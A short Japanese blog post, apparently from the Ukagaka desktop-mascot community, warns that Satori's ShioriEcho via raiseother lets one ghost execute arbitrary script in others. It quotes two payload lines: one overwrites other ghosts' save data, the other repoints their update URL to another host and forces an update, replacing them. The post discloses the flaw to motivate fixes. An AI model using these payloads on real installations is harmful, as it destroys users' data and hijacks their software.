里々とShioriEchoと任意のコード

昨日、整備班の里々だと、raiseotherのShioriEchoで\![vanishbymyself]ができちゃうという話を書いていて、wiz★さんやasさんが対策を考えられていたけれど。
実は、\![vanishbymyself]を実行できてしまうというのは一種の象徴的な話で、真に恐ろしいのは、任意のコードが実行できてしまうということ。
もし、対象ゴーストがssu.dllのSAORIを入れてるのなら
\![raiseother,__SYSTEM_ALL_GHOST__,ShioriEcho,(set,ユーザー名,ほげほげ)]
なんてやって相手ゴーストのセーブデータをぐちゃくちゃに破壊してしまうのも可能だし、もっと無茶に
\![raiseother,__SYSTEM_ALL_GHOST__,ShioriEcho,(set,homeurl,http://other_ghost.com/)\![updatebymyself] ]
とかやって相手ゴーストを強制的に別ゴーストに書き換えてしまうなんてマネも。

さとーさんが懸念していたゴーストがワームと化す日 comes true...?